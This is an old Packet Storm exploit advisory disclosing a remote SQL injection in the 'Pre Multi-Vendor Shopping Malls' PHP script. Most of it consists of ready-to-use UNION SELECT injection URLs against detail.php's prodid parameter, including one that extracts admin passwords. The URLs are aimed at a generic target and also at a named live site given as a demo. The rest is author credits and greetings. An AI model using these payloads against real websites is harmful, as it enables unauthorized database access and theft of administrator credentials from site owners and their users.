premulti-sql.txt

2008-11-03T00:00:00
ID PACKETSTORM:71457
Type packetstorm
Reporter d3b4g
Modified 2008-11-03T00:00:00

Description

                                        
                                            ` Pre Multi-Vendor Shopping Malls [id]Remote SQL Injection Vulnerability  
--------------------------------------------------------------------------------  
  
  
----------------------------------------------------------------  
script : Pre Multi-Vendor Shopping Malls  
  
script : http://www.preprojects.com/pclphp.asp  
  
Risk : High  
  
----------------------------------------------------------------  
  
Dicovered by : d3b4g  
  
email : bl4ckend[at]gmail[dot]com  
  
Site. www.bl4ck3nd.info  
  
----------------------------------------------------------------  
Exploit : http://target.com/[path]/detail.php?prodid=detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*  
  
Live demo: http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*  
  
For admin : http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin/*  
  
# Rest find =P  
  
----------------------------------------------------------------  
  
  
----------------------------------------------------------------  
Greetz: str0ke,,Hotlism.org,All my friends  
  
-----------------------------------------------------------------  
Proud to be a maldivian :))  
=======================  
  
  
`